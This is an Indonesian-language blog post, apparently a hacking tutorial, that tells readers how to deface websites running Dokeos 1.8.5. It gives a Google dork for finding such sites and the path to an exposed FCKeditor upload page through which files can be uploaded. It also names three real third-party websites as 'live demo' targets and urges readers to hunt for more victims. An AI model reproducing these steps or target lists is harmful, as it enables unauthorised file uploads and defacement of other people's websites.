Apa kabar nya nih ? pastinya baik.
Pada kali ini, kita akan membahas seputar exploit, defacement.
Ya, melalui beberapa plugins yang alhamdulillah ada celah.
Untuk mempersingkat waktu ? yuk mari kita bahas .
Dalam cara ini, kita hanya memerlukan sedikit persiapan.
Hanya membutuhkan iman yang besar .
Dork for google:
"Portail Dokeos 1.8.5"
Exploit:
http://[localhost]/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Preview:
http://[localhost]/patch/main/upload/[yourfiles]
Allowed File:
html, txt, phps, etc.
Live Demo:
http://www.dijon.iufm.fr/dokeos/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Cukup 3 saja untuk kalian hehe.
Supaya ilmu anda berkembang, dan berusaha untuk mencari sendiri.
Apakah anda menemukan kesulitan ? saya rasa tidak .
Ya, karena semua tutorial yang saya berikan sangat mudah, tapi mematikan. hhaha
Okelah, semoga bermanfaat ya Oh ya ? kalo yang sudah baca ini, terus mau copas ? jangan lupa direct link nya ke blog saya.
Hargailah usaha orang! coba aja cari di google seluruh artikel yang saya buat.
Kebanyakan tidak ada, meskipun ada ? itu paling punya saya haha.
Okay lah, pamit dulu ya Wassalamualaikum

Write anything about you here!
Tidak ada komentar:
Posting Komentar